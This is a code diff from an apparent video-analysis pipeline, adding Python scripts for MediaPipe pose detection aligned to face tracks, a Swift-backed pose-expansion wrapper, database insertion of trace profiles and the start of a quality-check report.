output_dir = Path(args.output_dir)
|
||||
if not output_dir.exists():
|
||||
print(f"Error: Output directory {output_dir} does not exist")
|
||||
sys.exit(1)
|
||||
|
||||
# Find all trace_profile.json files
|
||||
print(f"Scanning {output_dir} for trace_profile.json files...")
|
||||
trace_profiles = list(output_dir.glob("*/trace_*/trace_profile.json"))
|
||||
print(f"Found {len(trace_profiles)} trace_profile.json files")
|
||||
|
||||
if not trace_profiles:
|
||||
print("No trace_profile.json files found")
|
||||
sys.exit(0)
|
||||
|
||||
# Parse profiles
|
||||
print("\nParsing trace profiles...")
|
||||
profiles = []
|
||||
for i, json_path in enumerate(trace_profiles):
|
||||
if (i + 1) % 500 == 0:
|
||||
print(f" Parsed {i + 1}/{len(trace_profiles)} files...")
|
||||
|
||||
profile = parse_trace_profile(json_path)
|
||||
if profile:
|
||||
profiles.append(profile)
|
||||
|
||||
print(f"Successfully parsed {len(profiles)} profiles")
|
||||
|
||||
# Filter profiles with VLM data
|
||||
vlm_profiles = [
|
||||
p
|
||||
for p in profiles
|
||||
if p.get("vlm_description") or p.get("vlm_clothing") or p.get("vlm_tags")
|
||||
]
|
||||
print(f"Profiles with VLM data: {len(vlm_profiles)}")
|
||||
|
||||
# Insert into PostgreSQL
|
||||
if not args.dry_run:
|
||||
print("\nConnecting to PostgreSQL...")
|
||||
conn = get_db_connection()
|
||||
else:
|
||||
conn = None
|
||||
print("\n[DRY-RUN] Skipping database connection")
|
||||
|
||||
# Insert in batches
|
||||
batch_size = args.batch_size
|
||||
total_inserted = 0
|
||||
|
||||
for i in range(0, len(profiles), batch_size):
|
||||
batch = profiles[i : i + batch_size]
|
||||
if conn:
|
||||
inserted = insert_trace_profiles(conn, batch, args.dry_run)
|
||||
total_inserted += inserted
|
||||
if (i // batch_size + 1) % 10 == 0:
|
||||
print(
|
||||
f" Inserted batch {i // batch_size + 1} ({len(batch)} profiles)"
|
||||
)
|
||||
else:
|
||||
total_inserted += len(batch)
|
||||
|
||||
if conn:
|
||||
conn.close()
|
||||
|
||||
print(f"\n✅ Done! Inserted {total_inserted} trace profiles")
|
||||
|
||||
# Show sample
|
||||
if vlm_profiles:
|
||||
print("\nSample VLM profile:")
|
||||
sample = vlm_profiles[0]
|
||||
print(f" file_uuid: {sample['file_uuid']}")
|
||||
print(f" trace_id: {sample['trace_id']}")
|
||||
print(f" name: {sample['name']}")
|
||||
print(f" vlm_description: {sample.get('vlm_description', '')[:100]}...")
|
||||
print(f" vlm_tags: {sample.get('vlm_tags', [])[:5]}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,246 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
MediaPipe Pose with Face Frame Alignment
|
||||
|
||||
1. Load frames with faces from Apple Vision face_traced.json
|
||||
2. Run MediaPipe pose only on those frames
|
||||
3. Filter poses aligned with face bboxes
|
||||
|
||||
Usage:
|
||||
python3 scripts/mediapipe_pose_aligned.py --video /path/to/video.mp4 --file-uuid <uuid> --output-dir /path/to/output
|
||||
|
||||
Output:
|
||||
{uuid}.pose.mediapipe.aligned.json
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import cv2
|
||||
import mediapipe as mp
|
||||
import numpy as np
|
||||
from mediapipe.tasks.python.vision import PoseLandmarker, PoseLandmarkerOptions
|
||||
from mediapipe.tasks.python.core.base_options import BaseOptions
|
||||
except ImportError as e:
|
||||
print(f"Missing dependency: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
LANDMARK_NAMES = [
|
||||
"nose", "left_eye_inner", "left_eye", "left_eye_outer",
|
||||
"right_eye_inner", "right_eye", "right_eye_outer",
|
||||
"left_ear", "right_ear", "mouth_left", "mouth_right",
|
||||
"left_shoulder", "right_shoulder", "left_elbow", "right_elbow",
|
||||
"left_wrist", "right_wrist", "left_pinky", "right_pinky",
|
||||
"left_index", "right_index", "left_thumb", "right_thumb",
|
||||
"left_hip", "right_hip", "left_knee", "right_knee",
|
||||
"left_ankle", "right_ankle", "left_heel", "right_heel",
|
||||
"left_foot_index", "right_foot_index",
|
||||
]
|
||||
|
||||
|
||||
def point_in_bbox(x, y, bbox):
|
||||
"""Check if point is inside bbox."""
|
||||
return bbox['x'] <= x <= bbox['x'] + bbox['width'] and bbox['y'] <= y <= bbox['y'] + bbox['height']
|
||||
|
||||
|
||||
def face_keypoints_aligned(keypoints, face_bboxes):
|
||||
"""Check if nose, left_eye, right_eye all in same face bbox."""
|
||||
kp_dict = {kp['name']: kp for kp in keypoints}
|
||||
|
||||
required = ['nose', 'left_eye', 'right_eye']
|
||||
if not all(k in kp_dict for k in required):
|
||||
return False, None
|
||||
|
||||
for bbox in face_bboxes:
|
||||
all_in = all(point_in_bbox(kp_dict[k]['x'], kp_dict[k]['y'], bbox) for k in required)
|
||||
if all_in:
|
||||
return True, bbox
|
||||
|
||||
return False, None
|
||||
|
||||
|
||||
def process_video(
|
||||
video_path: str,
|
||||
face_json_path: str,
|
||||
output_path: str,
|
||||
file_uuid: str,
|
||||
) -> dict:
|
||||
"""
|
||||
Process video with MediaPipe pose on frames with faces.
|
||||
"""
|
||||
# Load face data
|
||||
print(f"[pose_aligned] Loading face data: {face_json_path}")
|
||||
with open(face_json_path) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
face_frames = face_data.get('frames', {})
|
||||
print(f"[pose_aligned] Frames with faces: {len(face_frames)}")
|
||||
|
||||
# Download model
|
||||
model_path = os.path.expanduser("~/.mediapipe/models/pose_landmarker_heavy.task")
|
||||
if not os.path.exists(model_path):
|
||||
os.makedirs(os.path.dirname(model_path), exist_ok=True)
|
||||
print(f"[pose_aligned] Downloading model...")
|
||||
import urllib.request
|
||||
url = "https://storage.googleapis.com/mediapipe-models/pose_landmarker/pose_landmarker_heavy/float16/1/pose_landmarker_heavy.task"
|
||||
urllib.request.urlretrieve(url, model_path)
|
||||
|
||||
# Initialize pose detector
|
||||
options = PoseLandmarkerOptions(
|
||||
base_options=BaseOptions(model_asset_path=model_path),
|
||||
running_mode=mp.tasks.vision.RunningMode.VIDEO,
|
||||
)
|
||||
detector = PoseLandmarker.create_from_options(options)
|
||||
|
||||
# Open video
|
||||
cap = cv2.VideoCapture(video_path)
|
||||
if not cap.isOpened():
|
||||
print(f"[pose_aligned] Cannot open video", file=sys.stderr)
|
||||
return {"error": "Cannot open video"}
|
||||
|
||||
fps = cap.get(cv2.CAP_PROP_FPS)
|
||||
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
|
||||
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
|
||||
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
|
||||
|
||||
print(f"[pose_aligned] Video: {total_frames} frames, {fps:.2f} fps, {width}x{height}")
|
||||
|
||||
frames_data = []
|
||||
total_poses = 0
|
||||
aligned_poses = 0
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
# Process only frames with faces
|
||||
face_frame_nums = sorted(int(k) for k in face_frames.keys())
|
||||
|
||||
for i, frame_num in enumerate(face_frame_nums):
|
||||
# Seek to frame
|
||||
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num)
|
||||
ret, frame = cap.read()
|
||||
|
||||
if not ret:
|
||||
continue
|
||||
|
||||
# Get face bboxes for this frame
|
||||
face_frame = face_frames[str(frame_num)]
|
||||
face_bboxes = []
|
||||
for face in face_frame.get('faces', []):
|
||||
face_bboxes.append({
|
||||
'x': face['x'], 'y': face['y'],
|
||||
'width': face['width'], 'height': face['height']
|
||||
})
|
||||
|
||||
# Detect pose
|
||||
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
|
||||
mp_image = mp.Image(mp.ImageFormat.SRGB, rgb_frame)
|
||||
results = detector.detect_for_video(mp_image, int(frame_num * 1000 / fps))
|
||||
|
||||
if results.pose_landmarks:
|
||||
persons = []
|
||||
|
||||
for pose_landmarks in results.pose_landmarks:
|
||||
total_poses += 1
|
||||
|
||||
# Convert landmarks
|
||||
keypoints = []
|
||||
for idx, landmark in enumerate(pose_landmarks):
|
||||
name = LANDMARK_NAMES[idx] if idx < len(LANDMARK_NAMES) else f"landmark_{idx}"
|
||||
kp = {
|
||||
"name": name,
|
||||
"x": landmark.x * width,
|
||||
"y": landmark.y * height,
|
||||
"z": landmark.z if hasattr(landmark, 'z') else 0,
|
||||
"confidence": landmark.visibility if hasattr(landmark, 'visibility') else 1.0,
|
||||
}
|
||||
keypoints.append(kp)
|
||||
|
||||
# Check alignment
|
||||
aligned, matched_bbox = face_keypoints_aligned(keypoints, face_bboxes)
|
||||
|
||||
if aligned:
|
||||
aligned_poses += 1
|
||||
face_keypoints = [kp for kp in keypoints if kp['name'] in ['nose', 'left_eye', 'right_eye']]
|
||||
|
||||
persons.append({
|
||||
"keypoints": keypoints,
|
||||
"face_keypoints": face_keypoints,
|
||||
"matched_face_bbox": matched_bbox,
|
||||
})
|
||||
|
||||
if persons:
|
||||
frames_data.append({
|
||||
"frame": frame_num,
|
||||
"timestamp": frame_num / fps,
|
||||
"persons": persons,
|
||||
})
|
||||
|
||||
if (i + 1) % 500 == 0:
|
||||
elapsed = time.time() - start_time
|
||||
print(f"[pose_aligned] Processed {i+1}/{len(face_frame_nums)} frames, {aligned_poses} aligned poses ({elapsed:.1f}s)")
|
||||
|
||||
cap.release()
|
||||
detector.close()
|
||||
|
||||
elapsed = time.time() - start_time
|
||||
|
||||
# Build output
|
||||
output = {
|
||||
"file_uuid": file_uuid,
|
||||
"processor": "mediapipe_pose_aligned",
|
||||
"fps": fps,
|
||||
"total_frames": total_frames,
|
||||
"face_frames_processed": len(face_frame_nums),
|
||||
"total_poses_detected": total_poses,
|
||||
"aligned_poses": aligned_poses,
|
||||
"alignment_rate": f"{aligned_poses / total_poses * 100:.1f}%" if total_poses > 0 else "0%",
|
||||
"frames_with_aligned_pose": len(frames_data),
|
||||
"elapsed_seconds": round(elapsed, 2),
|
||||
"frames": frames_data,
|
||||
}
|
||||
|
||||
# Save
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(output, f)
|
||||
|
||||
print(f"\n[pose_aligned] Saved: {output_path}")
|
||||
print(f"[pose_aligned] Total poses detected: {total_poses}")
|
||||
print(f"[pose_aligned] Aligned poses: {aligned_poses} ({output['alignment_rate']})")
|
||||
print(f"[pose_aligned] Frames with aligned pose: {len(frames_data)}")
|
||||
print(f"[pose_aligned] Elapsed: {elapsed:.1f}s")
|
||||
|
||||
return output
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="MediaPipe pose aligned with face frames")
|
||||
parser.add_argument("--video", "-v", required=True, help="Video file path")
|
||||
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
args = parser.parse_args()
|
||||
|
||||
output_path = Path(args.output_dir)
|
||||
face_json = output_path / f"{args.file_uuid}.face_traced.json"
|
||||
|
||||
if not face_json.exists():
|
||||
print(f"[pose_aligned] Face file not found: {face_json}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
output_file = output_path / f"{args.file_uuid}.pose.mediapipe.aligned.json"
|
||||
|
||||
result = process_video(
|
||||
args.video,
|
||||
str(face_json),
|
||||
str(output_file),
|
||||
args.file_uuid,
|
||||
)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,219 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
MediaPipe Pose Processor - Using MediaPipe Pose Landmarker
|
||||
|
||||
Detects human pose with 33 keypoints, including face landmarks (nose, eyes).
|
||||
Coordinates are normalized (0-1), converted to pixel coordinates.
|
||||
|
||||
Usage:
|
||||
python3 scripts/mediapipe_pose_processor.py --video /path/to/video.mp4 --file-uuid <uuid> --output-dir /path/to/output
|
||||
|
||||
Output:
|
||||
{uuid}.pose.mediapipe.json
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import cv2
|
||||
import mediapipe as mp
|
||||
import numpy as np
|
||||
from mediapipe.tasks.python.vision import PoseLandmarker, PoseLandmarkerOptions
|
||||
from mediapipe.tasks.python.core.base_options import BaseOptions
|
||||
except ImportError as e:
|
||||
print(f"Missing dependency: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
# MediaPipe Pose landmark names (33 keypoints)
|
||||
LANDMARK_NAMES = [
|
||||
"nose", "left_eye_inner", "left_eye", "left_eye_outer",
|
||||
"right_eye_inner", "right_eye", "right_eye_outer",
|
||||
"left_ear", "right_ear", "mouth_left", "mouth_right",
|
||||
"left_shoulder", "right_shoulder", "left_elbow", "right_elbow",
|
||||
"left_wrist", "right_wrist", "left_pinky", "right_pinky",
|
||||
"left_index", "right_index", "left_thumb", "right_thumb",
|
||||
"left_hip", "right_hip", "left_knee", "right_knee",
|
||||
"left_ankle", "right_ankle", "left_heel", "right_heel",
|
||||
"left_foot_index", "right_foot_index",
|
||||
]
|
||||
|
||||
|
||||
def process_video(
|
||||
video_path: str,
|
||||
output_path: str,
|
||||
file_uuid: str,
|
||||
sample_interval: int = 3, # Match Apple Vision default
|
||||
) -> dict:
|
||||
"""
|
||||
Process video with MediaPipe Pose.
|
||||
|
||||
Args:
|
||||
video_path: Path to video file
|
||||
output_path: Output JSON path
|
||||
file_uuid: File UUID
|
||||
sample_interval: Process every N frames
|
||||
|
||||
Returns:
|
||||
Dict with pose data
|
||||
"""
|
||||
# Download model if not exists
|
||||
model_path = os.path.expanduser("~/.mediapipe/models/pose_landmarker_heavy.task")
|
||||
if not os.path.exists(model_path):
|
||||
os.makedirs(os.path.dirname(model_path), exist_ok=True)
|
||||
print(f"[mediapipe_pose] Downloading model...")
|
||||
import urllib.request
|
||||
url = "https://storage.googleapis.com/mediapipe-models/pose_landmarker/pose_landmarker_heavy/float16/1/pose_landmarker_heavy.task"
|
||||
urllib.request.urlretrieve(url, model_path)
|
||||
print(f"[mediapipe_pose] Model downloaded to {model_path}")
|
||||
|
||||
# Initialize Pose Landmarker
|
||||
options = PoseLandmarkerOptions(
|
||||
base_options=BaseOptions(model_asset_path=model_path),
|
||||
running_mode=mp.tasks.vision.RunningMode.VIDEO,
|
||||
)
|
||||
detector = PoseLandmarker.create_from_options(options)
|
||||
|
||||
# Open video
|
||||
cap = cv2.VideoCapture(video_path)
|
||||
if not cap.isOpened():
|
||||
print(f"[mediapipe_pose] Cannot open video: {video_path}", file=sys.stderr)
|
||||
return {"error": "Cannot open video"}
|
||||
|
||||
fps = cap.get(cv2.CAP_PROP_FPS)
|
||||
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
|
||||
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
|
||||
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
|
||||
|
||||
print(f"[mediapipe_pose] Video: {total_frames} frames, {fps:.2f} fps, {width}x{height}")
|
||||
print(f"[mediapipe_pose] Processing every {sample_interval} frames...")
|
||||
|
||||
frames_data = []
|
||||
frame_num = 0
|
||||
processed_count = 0
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
while True:
|
||||
ret, frame = cap.read()
|
||||
if not ret:
|
||||
break
|
||||
|
||||
# Process every N frames
|
||||
if frame_num % sample_interval == 0:
|
||||
# Convert BGR to RGB
|
||||
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
|
||||
|
||||
# Create MediaPipe Image
|
||||
mp_image = mp.Image(mp.ImageFormat.SRGB, rgb_frame)
|
||||
|
||||
# Detect pose
|
||||
results = detector.detect_for_video(mp_image, int(frame_num * 1000 / fps))
|
||||
|
||||
if results.pose_landmarks:
|
||||
for pose_landmarks in results.pose_landmarks:
|
||||
keypoints = []
|
||||
face_keypoints = []
|
||||
|
||||
for idx, landmark in enumerate(pose_landmarks):
|
||||
name = LANDMARK_NAMES[idx] if idx < len(LANDMARK_NAMES) else f"landmark_{idx}"
|
||||
kp = {
|
||||
"name": name,
|
||||
"x": landmark.x * width,
|
||||
"y": landmark.y * height,
|
||||
"z": landmark.z if hasattr(landmark, 'z') else 0,
|
||||
"confidence": landmark.visibility if hasattr(landmark, 'visibility') else 1.0,
|
||||
}
|
||||
keypoints.append(kp)
|
||||
|
||||
if name in ["nose", "left_eye", "right_eye"]:
|
||||
face_keypoints.append(kp)
|
||||
|
||||
# Calculate bbox from all keypoints
|
||||
valid_kps = [kp for kp in keypoints if kp["confidence"] > 0.3]
|
||||
if valid_kps:
|
||||
x_coords = [kp["x"] for kp in valid_kps]
|
||||
y_coords = [kp["y"] for kp in valid_kps]
|
||||
bbox = {
|
||||
"x": min(x_coords),
|
||||
"y": min(y_coords),
|
||||
"width": max(x_coords) - min(x_coords),
|
||||
"height": max(y_coords) - min(y_coords),
|
||||
}
|
||||
else:
|
||||
bbox = {"x": 0, "y": 0, "width": 0, "height": 0}
|
||||
|
||||
frames_data.append({
|
||||
"frame": frame_num,
|
||||
"timestamp": frame_num / fps,
|
||||
"persons": [{
|
||||
"keypoints": keypoints,
|
||||
"bbox": bbox,
|
||||
"face_keypoints": face_keypoints,
|
||||
}],
|
||||
})
|
||||
|
||||
processed_count += 1
|
||||
|
||||
if processed_count % 100 == 0:
|
||||
elapsed = time.time() - start_time
|
||||
print(f"[mediapipe_pose] Processed {processed_count} poses ({elapsed:.1f}s)")
|
||||
|
||||
frame_num += 1
|
||||
|
||||
cap.release()
|
||||
detector.close()
|
||||
|
||||
elapsed = time.time() - start_time
|
||||
|
||||
# Build output
|
||||
output = {
|
||||
"file_uuid": file_uuid,
|
||||
"processor": "mediapipe_pose",
|
||||
"fps": fps,
|
||||
"frame_count": total_frames,
|
||||
"sample_interval": sample_interval,
|
||||
"total_poses": len(frames_data),
|
||||
"elapsed_seconds": round(elapsed, 2),
|
||||
"frames": frames_data,
|
||||
}
|
||||
|
||||
# Save
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(output, f)
|
||||
|
||||
print(f"[mediapipe_pose] Saved: {output_path}")
|
||||
print(f"[mediapipe_pose] Total poses: {len(frames_data)}")
|
||||
print(f"[mediapipe_pose] Elapsed: {elapsed:.1f}s")
|
||||
|
||||
return output
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="MediaPipe Pose Processor")
|
||||
parser.add_argument("--video", "-v", required=True, help="Video file path")
|
||||
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
parser.add_argument("--sample-interval", "-s", type=int, default=3, help="Process every N frames")
|
||||
args = parser.parse_args()
|
||||
|
||||
output_path = Path(args.output_dir) / f"{args.file_uuid}.pose.mediapipe.json"
|
||||
|
||||
result = process_video(
|
||||
args.video,
|
||||
str(output_path),
|
||||
args.file_uuid,
|
||||
args.sample_interval,
|
||||
)
|
||||
|
||||
if "error" not in result:
|
||||
print(f"\n[mediapipe_pose] Done. Output: {output_path}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -109,6 +109,7 @@ if __name__ == "__main__":
|
||||
parser.add_argument("--uuid", "-u", default="")
|
||||
parser.add_argument("--sample-interval", type=int, default=30)
|
||||
parser.add_argument("--recognition-level", choices=["fast", "accurate"], default="accurate")
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
args = parser.parse_args()
|
||||
|
||||
publisher = RedisPublisher(args.uuid) if args.uuid else None
|
||||
|
||||
@@ -291,6 +291,8 @@ def _fallback(video_path, output_path, uuid, sample_interval):
|
||||
frame_count += 1
|
||||
cap.release()
|
||||
result = {"frame_count": len(frames), "fps": fps, "frames": frames}
|
||||
if len(frames) == 0:
|
||||
result["status"] = "no_face"
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(result, f, indent=2)
|
||||
return result
|
||||
|
||||
@@ -0,0 +1,195 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Pose Expansion Processor V2
|
||||
|
||||
Calls swift_pose_expansion which:
|
||||
1. Reads face_traced.json (from face tracking with trace_id)
|
||||
2. Expands pose detection from trace frames
|
||||
3. Stops when 3 consecutive frames have no pose
|
||||
4. Outputs at 8Hz sampling (floor(fps/8))
|
||||
|
||||
Flow:
|
||||
face_processor.py → face.json
|
||||
store_traced_faces.py → face_traced.json (with trace_id)
|
||||
pose_processor.py → pose.json (this script)
|
||||
appearance_processor.py → appearance.json
|
||||
"""
|
||||
|
||||
import sys
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
from redis_publisher import RedisPublisher
|
||||
|
||||
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
|
||||
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_pose_expansion")
|
||||
SWIFT_BIN_DEBUG = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "debug", "swift_pose_expansion")
|
||||
|
||||
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
|
||||
|
||||
|
||||
def process_pose(
|
||||
video_path: str,
|
||||
output_path: str,
|
||||
uuid: str = "",
|
||||
publisher: RedisPublisher = None,
|
||||
) -> dict:
|
||||
"""Process pose expansion from face traces.
|
||||
|
||||
Args:
|
||||
video_path: Path to video file
|
||||
output_path: Path to output pose.json
|
||||
uuid: File UUID for logging
|
||||
publisher: Redis publisher for progress updates
|
||||
"""
|
||||
# Check if pose.json already exists
|
||||
if os.path.exists(output_path):
|
||||
with open(output_path) as f:
|
||||
data = json.load(f)
|
||||
frame_count = len(data.get("frames", []))
|
||||
print(f"[Pose] Output exists: {output_path} ({frame_count} frames)", file=sys.stderr)
|
||||
if publisher:
|
||||
publisher.progress("pose", 100, 100, f"{frame_count} frames (exists)")
|
||||
return data
|
||||
|
||||
# Determine file_uuid from output_path
|
||||
file_uuid = os.path.basename(output_path).replace(".pose.json", "")
|
||||
|
||||
# Find face_traced.json
|
||||
face_traced_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.face_traced.json")
|
||||
face_json_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.face.json")
|
||||
|
||||
# Prefer face_traced.json (has trace_id), fallback to face.json
|
||||
input_face_path = None
|
||||
if os.path.exists(face_traced_path):
|
||||
input_face_path = face_traced_path
|
||||
print(f"[Pose] Using face_traced.json: {face_traced_path}", file=sys.stderr)
|
||||
elif os.path.exists(face_json_path):
|
||||
# Try to run face tracking to generate face_traced.json
|
||||
print(f"[Pose] face_traced.json not found, running face tracker...", file=sys.stderr)
|
||||
try:
|
||||
tracker_script = os.path.join(SCRIPT_DIR, "store_traced_faces.py")
|
||||
if os.path.exists(tracker_script):
|
||||
result = subprocess.run(
|
||||
["python3", tracker_script, "--file-uuid", file_uuid],
|
||||
capture_output=True, text=True, timeout=300
|
||||
)
|
||||
if result.returncode == 0 and os.path.exists(face_traced_path):
|
||||
input_face_path = face_traced_path
|
||||
print(f"[Pose] Face tracing completed: {face_traced_path}", file=sys.stderr)
|
||||
else:
|
||||
print(f"[Pose] Face tracing failed, falling back to face.json", file=sys.stderr)
|
||||
input_face_path = face_json_path
|
||||
else:
|
||||
input_face_path = face_json_path
|
||||
except Exception as e:
|
||||
print(f"[Pose] Face tracking error: {e}, falling back to face.json", file=sys.stderr)
|
||||
input_face_path = face_json_path
|
||||
|
||||
if input_face_path == face_json_path:
|
||||
print(f"[Pose] WARNING: Using face.json without trace_id", file=sys.stderr)
|
||||
else:
|
||||
print(f"[Pose] ERROR: No face.json found for {file_uuid}", file=sys.stderr)
|
||||
# Return empty result
|
||||
empty_result = {"frame_count": 0, "fps": 0.0, "frames": []}
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(empty_result, f)
|
||||
return empty_result
|
||||
|
||||
# Build swift_pose_expansion if needed
|
||||
swift_bin = SWIFT_BIN if os.path.exists(SWIFT_BIN) else SWIFT_BIN_DEBUG
|
||||
if not os.path.exists(swift_bin):
|
||||
build_dir = os.path.join(SCRIPT_DIR, "swift_processors")
|
||||
print(f"[Pose] Building swift_pose_expansion in {build_dir}...", file=sys.stderr)
|
||||
result = subprocess.run(
|
||||
["swift", "build", "-c", "release", "--product", "swift_pose_expansion"],
|
||||
cwd=build_dir, capture_output=True, text=True
|
||||
)
|
||||
if result.returncode != 0:
|
||||
print(f"[Pose] Build failed: {result.stderr}", file=sys.stderr)
|
||||
raise RuntimeError("Failed to build swift_pose_expansion")
|
||||
swift_bin = SWIFT_BIN
|
||||
|
||||
# Run swift_pose_expansion
|
||||
cmd = [
|
||||
swift_bin,
|
||||
video_path,
|
||||
input_face_path,
|
||||
output_path,
|
||||
]
|
||||
if uuid:
|
||||
cmd.extend(["--uuid", uuid])
|
||||
|
||||
print(f"[Pose] Running: {' '.join(cmd)}", file=sys.stderr)
|
||||
|
||||
t0 = time.time()
|
||||
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
||||
|
||||
# Monitor progress
|
||||
last_progress = ""
|
||||
while proc.poll() is None:
|
||||
time.sleep(5)
|
||||
# Read stderr for progress
|
||||
try:
|
||||
# Non-blocking read
|
||||
import select
|
||||
if select.select([proc.stderr], [], [], 0)[0]:
|
||||
line = proc.stderr.readline().strip()
|
||||
if line and line != last_progress:
|
||||
last_progress = line
|
||||
print(f"[Pose] {line}", file=sys.stderr)
|
||||
if publisher and "frames" in line:
|
||||
publisher.progress("pose", 50, 100, line)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Read remaining output
|
||||
stdout, stderr = proc.communicate()
|
||||
if stdout:
|
||||
print(stdout, file=sys.stderr)
|
||||
if stderr:
|
||||
print(stderr, file=sys.stderr)
|
||||
|
||||
elapsed = time.time() - t0
|
||||
|
||||
if proc.returncode != 0:
|
||||
print(f"[Pose] ERROR: swift_pose_expansion exited with code {proc.returncode}", file=sys.stderr)
|
||||
if publisher:
|
||||
publisher.error("pose", f"Process failed with code {proc.returncode}")
|
||||
raise RuntimeError(f"swift_pose_expansion failed: {proc.returncode}")
|
||||
|
||||
# Load result
|
||||
if not os.path.exists(output_path):
|
||||
print(f"[Pose] ERROR: Output file not created: {output_path}", file=sys.stderr)
|
||||
raise RuntimeError("Pose output not created")
|
||||
|
||||
with open(output_path) as f:
|
||||
result = json.load(f)
|
||||
|
||||
frame_count = len(result.get("frames", []))
|
||||
print(f"[Pose] Done: {frame_count} frames in {elapsed:.1f}s", file=sys.stderr)
|
||||
|
||||
if publisher:
|
||||
publisher.progress("pose", 100, 100, f"{frame_count} frames")
|
||||
publisher.complete("pose", f"{frame_count} frames")
|
||||
|
||||
return result
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description="Pose Expansion Processor")
|
||||
parser.add_argument("video_path", help="Video file path")
|
||||
parser.add_argument("output_path", help="Output pose.json path")
|
||||
parser.add_argument("--uuid", "-u", default="", help="File UUID for logging")
|
||||
args = parser.parse_args()
|
||||
|
||||
publisher = RedisPublisher(args.uuid) if args.uuid else None
|
||||
if publisher:
|
||||
publisher.info("pose", "POSE_START")
|
||||
|
||||
result = process_pose(args.video_path, args.output_path, args.uuid, publisher)
|
||||
print(f"Pose: {len(result.get('frames', []))} frames with poses")
|
||||
@@ -0,0 +1,162 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
QC Report for all completed files.
|
||||
Checks pipeline standards and lists missing/invalid items.
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import psycopg2
|
||||
from pathlib import Path
|
||||
|
||||
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
|
||||
DATABASE_URL = os.environ.get("DATABASE_URL", "postgresql://accusys@localhost:5432/momentry")
|
||||
|
||||
# Required processor outputs
|
||||
REQUIRED_PROCESSORS = ["face.json", "asr.json", "asrx.json", "ocr.json", "pose.json", "cut.json", "face_cluster.json", "face_traced.json", "profile.json"]
|
||||
|
||||
def get_db_connection():
|
||||
return psycopg2.connect(DATABASE_URL)
|
||||
|
||||
def check_processor_files(uuid):
|
||||
"""Check if all required processor output files exist."""
|
||||
missing = []
|
||||
for proc in REQUIRED_PROCESSORS:
|
||||
path = Path(OUTPUT_DIR) / f"{uuid}.{proc}"
|
||||
if not path.exists():
|
||||
missing.append(proc)
|
||||
return missing
|
||||
|
||||
def check_trace_profiles(conn, uuid):
|
||||
"""Check trace_profiles data quality."""
|
||||
with conn.cursor() as cur:
|
||||
cur.execute("SELECT COUNT(*), SUM(frame_count), COUNT(CASE WHEN name IS NOT NULL AND name != '' THEN 1 END) FROM public.trace_profiles WHERE file_uuid = %s", (uuid,))
|
||||
count, total_frames, named_count = cur.fetchone()
|
||||
|
||||
cur.execute("SELECT COUNT(*) FROM public.trace_profiles WHERE file_uuid = %s AND frame_count <= 0", (uuid,))
|
||||
zero_frames = cur.fetchone()[0]
|
||||
|
||||
cur.execute("SELECT COUNT(*) FROM public.trace_profiles WHERE file_uuid = %s AND (vlm_description IS NULL OR vlm_description = '')", (uuid,))
|
||||
no_vlm_desc = cur.fetchone()[0]
|
||||
|
||||
issues = []
|
||||
if count == 0:
|
||||
